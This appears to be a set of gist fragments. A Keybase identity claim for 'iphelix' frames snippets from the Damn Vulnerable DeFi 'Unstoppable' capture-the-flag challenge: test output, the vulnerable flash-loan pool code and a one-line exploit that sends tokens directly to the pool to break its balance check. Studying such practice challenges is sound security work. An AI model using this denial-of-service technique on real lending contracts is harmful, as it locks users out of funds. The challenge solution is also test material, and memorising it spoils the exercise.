I hereby claim:
- I am iphelix on github.
- I am iphelix (https://keybase.io/iphelix) on keybase.
- I have a public key ASBTq-aZQMXn21DK4JKw5_atUa0QwLExFaLZ8zvDhaDOZQo
To claim this, I am signing this object:
% npm run | |
Lifecycle scripts included in : | |
test | |
npm run compile && npx mocha --timeout 5000 --exit --recursive test | |
available via `npm run-script`: | |
unstoppable | |
npm run compile && npx mocha --timeout 5000 --exit test/unstoppable/unstoppable.challenge.js | |
truster | |
npm run compile && npx mocha --timeout 5000 --exit test/truster/truster.challenge.js |
% npm run unstoppable | |
... | |
[Challenge] Unstoppable | |
✓ Exploit (66ms) | |
1 passing (3s) |
it('Exploit', async function () { | |
/** YOUR EXPLOIT GOES HERE */ | |
await this.token.transfer(this.pool.address, INITIAL_ATTACKER_BALANCE, {from: attacker }); | |
}); |
IERC20 public damnValuableToken; | |
uint256 public poolBalance; | |
constructor(address tokenAddress) public { | |
require(tokenAddress != address(0), "Token address cannot be zero"); | |
damnValuableToken = IERC20(tokenAddress); | |
} | |
function depositTokens(uint256 amount) external nonReentrant { | |
require(amount > 0, "Must deposit at least one token"); |
% npm run unstoppable | |
... | |
[Challenge] Unstoppable | |
✓ Exploit | |
1) "after all" hook for "Exploit" | |
1 passing (3s) | |
1 failing |
it('Exploit', async function () { | |
/** YOUR EXPLOIT GOES HERE */ | |
}); | |
after(async function () { | |
/** SUCCESS CONDITION */ | |
await expectRevert.unspecified( | |
this.receiverContract.executeFlashLoan(10, { from: someUser }) | |
); | |
}); |
function executeFlashLoan(uint256 amount) external { | |
require(msg.sender == owner, "Only owner can execute flash loan"); | |
pool.flashLoan(amount); | |
} |
function flashLoan(uint256 borrowAmount) external nonReentrant { | |
require(borrowAmount > 0, "Must borrow at least one token"); | |
uint256 balanceBefore = damnValuableToken.balanceOf(address(this)); | |
require(balanceBefore >= borrowAmount, "Not enough tokens in pool"); | |
// Ensured by the protocol via the `depositTokens` function | |
assert(poolBalance == balanceBefore); | |
damnValuableToken.transfer(msg.sender, borrowAmount); |
I hereby claim:
To claim this, I am signing this object: